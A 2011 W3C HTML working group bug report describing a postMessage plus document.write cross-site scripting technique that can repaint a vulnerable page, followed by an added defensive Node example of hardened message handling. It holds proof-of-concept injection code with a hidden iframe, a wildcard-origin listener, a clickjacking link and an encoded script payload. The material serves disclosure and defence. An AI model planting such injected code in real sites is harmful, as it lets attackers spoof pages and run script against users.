- From: <bugzilla@jessica.w3.org>
- Date: Mon, 11 Apr 2011 10:02:41 +0000
- To: public-html-bugzilla@w3.org
http://www.w3.org/Bugs/Public/show_bug.cgi?id=12469
Summary: Dynamic Cross-Site Scripting and Page Repainting
Product: HTML WG
Version: unspecified
Platform: All
OS/Version: All
Status: NEW
Severity: critical
Priority: P2
Component: HTML5 spec (editor: Ian Hickson)
AssignedTo: ian@hixie.ch
ReportedBy: simon.young90@live.com
QAContact: public-html-bugzilla@w3.org
CC: mike@w3.org, public-html-wg-issue-tracking@w3.org, public-html@w3.org
It has come to my attention in my studies that the addition of cross-document
messaging in HTML5 allows a new, dynamic form of cross-site scripting to be
developed, employing legitimate communications between injected content. By
accompanying this with the document.write() function, this could then be used
to dynamically control ("repaint") the entire content of a webpage vulnerable to
code injection. A website could then be completely simulated by the XSS attack
while still residing on a legitimate domain: a man-in-the-middle, blue-pill-esque
attack.
In this example, dynamically served code is appended to the original page;
removing document.getElementsByTagName('html')[0].innerHTML from the call will
allow the page to be completely changed:
>>>>> Injected Code:
<!-- Hidden frame pointing at the attacker-controlled server page. -->
<iframe id="mommy" src="URL" style="visibility:hidden; height:0;
width:0"></iframe>
<script>
  // Accept a message from any window and append its decoded contents to the
  // current document via document.write(); dropping the existing innerHTML
  // from the concatenation replaces the page outright.
  window.addEventListener("message", recvPayload, false);
  function recvPayload(event) {
    document.write(document.getElementsByTagName('html')[0].innerHTML +
                   unescape(event.data));
  }
  // Ask the hidden frame for its payload; targetOrigin "*" delivers the
  // request whatever origin the frame has loaded.
  function requestPayload() {
    var frame = document.getElementById("mommy");
    frame.contentWindow.postMessage("baby wants milk!", "*");
  }
</script>
<!-- clickjacking: the victim's click triggers the request -->
<a href="#" onclick="requestPayload(); return false;">click</a>
>>>>> Server Page:
<script>
  // Percent-encoded form of <script>alert("Dynamic XSS!");</script>, decoded
  // by the injected page's unescape() call before it is written into the DOM.
  var payload = "%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%44%79%6E%61%6D" +
                "%69%63%20%58%53%53%21%22%29%3B%3C%2F%73%63%72%69%70%74%3E";
  // Reply to whichever window sent the request, addressed to its own origin.
  window.addEventListener("message", sendPayload, false);
  function sendPayload(event) {
    event.source.postMessage(payload, event.origin);
  }
</script>
I propose the addition of a tag which disables any script within its bounds,
perhaps along the lines of <plaintext></plaintext>. This would allow web
developers to disable areas of a page from using script, blocking XSS attacks.
I would appreciate your thoughts on this.
Many Thanks,
Simon Young
Received on Monday, 11 April 2011 10:02:44 UTC
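The listener in the report accepts a message from any window and feeds it to document.write(), and its sender addresses the reply with targetOrigin "*". The following is an added example, not code from the bug report, that models both ends of that exchange in plain Node with constructed message events: the unchecked receiver beside one that validates event.origin, insists on a structured message, and keeps the data away from HTML sinks. The origins, the message schema and the postMessage model are assumptions made for the example; the encoded payload is the one from the report's server page.

```javascript
// Added example (not the bug report's code). Models window.postMessage()
// delivery and two receivers, one unchecked and one hardened. Origins are
// assumptions for the example.
const VICTIM_ORIGIN = "https://victim.example";   // page carrying the listener
const TRUSTED_ORIGIN = "https://app.example";     // the only frame it should hear from
const EVIL_ORIGIN = "https://attacker.example";

// Constructed sample: the percent-encoded payload from the report's server page.
const REPORT_PAYLOAD =
  "%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%44%79%6E%61%6D" +
  "%69%63%20%58%53%53%21%22%29%3B%3C%2F%73%63%72%69%70%74%3E";

// The report decodes with unescape(); for ASCII-only %XX sequences
// decodeURIComponent() yields the identical string.
function decodePayload(encoded) {
  return decodeURIComponent(encoded);
}

// Minimal model of window.postMessage(data, targetOrigin): the browser drops
// the message unless targetOrigin is "*" or equals the receiving window's
// origin; otherwise the listener runs with event.origin set to the sender.
function postMessage(data, targetOrigin, senderOrigin, receiver) {
  if (targetOrigin !== "*" && targetOrigin !== receiver.origin) {
    return false; // never delivered
  }
  return receiver.onmessage({ data: data, origin: senderOrigin }, receiver.doc);
}

// Unchecked receiver, mirroring the report's recvPayload(): any window that
// holds a reference to this one can push markup into an HTML sink.
function unsafeReceive(event, doc) {
  doc.html += decodePayload(event.data);
  return true;
}

// Hardened receiver: check the sender, require a structured message, and
// write the result to a text sink so it is never parsed as HTML.
function safeReceive(event, doc) {
  if (event.origin !== TRUSTED_ORIGIN) return false;   // 1. who sent it
  let msg;
  try {
    msg = JSON.parse(event.data);                      // 2. fixed schema, not free markup
  } catch (e) {
    return false;
  }
  if (!msg || typeof msg.text !== "string") return false;
  doc.text = msg.text;                                 // 3. textContent-style sink
  return true;
}

function newWindow(origin, onmessage) {
  return { origin: origin, onmessage: onmessage, doc: { html: "<body></body>", text: "" } };
}

// Replay the report's exchange against both receivers and return what each
// document ends up holding.
function demo() {
  const victimUnsafe = newWindow(VICTIM_ORIGIN, unsafeReceive);
  const victimSafe = newWindow(VICTIM_ORIGIN, safeReceive);

  // Attacker frame answering with targetOrigin "*", as in the report.
  const hitUnsafe = postMessage(REPORT_PAYLOAD, "*", EVIL_ORIGIN, victimUnsafe);
  const hitSafe = postMessage(REPORT_PAYLOAD, "*", EVIL_ORIGIN, victimSafe);

  // Legitimate frame sending a structured message, addressed to the page's origin.
  const okSafe = postMessage(JSON.stringify({ text: "hello" }), VICTIM_ORIGIN,
                             TRUSTED_ORIGIN, victimSafe);

  // A sender that pins targetOrigin: a message meant for another origin is dropped.
  const misdirected = postMessage("secret", "https://other.example",
                                  TRUSTED_ORIGIN, victimUnsafe);

  return {
    hitUnsafe: hitUnsafe,
    hitSafe: hitSafe,
    okSafe: okSafe,
    misdirected: misdirected,
    unsafeHtml: victimUnsafe.doc.html,
    safeText: victimSafe.doc.text
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Run with `node` to see the unchecked document end up holding the decoded script tag while the hardened one holds only the text "hello". The origin check on its own is not enough: a trusted sender can still be compromised or tricked, which is why the hardened receiver also refuses to treat the data as markup.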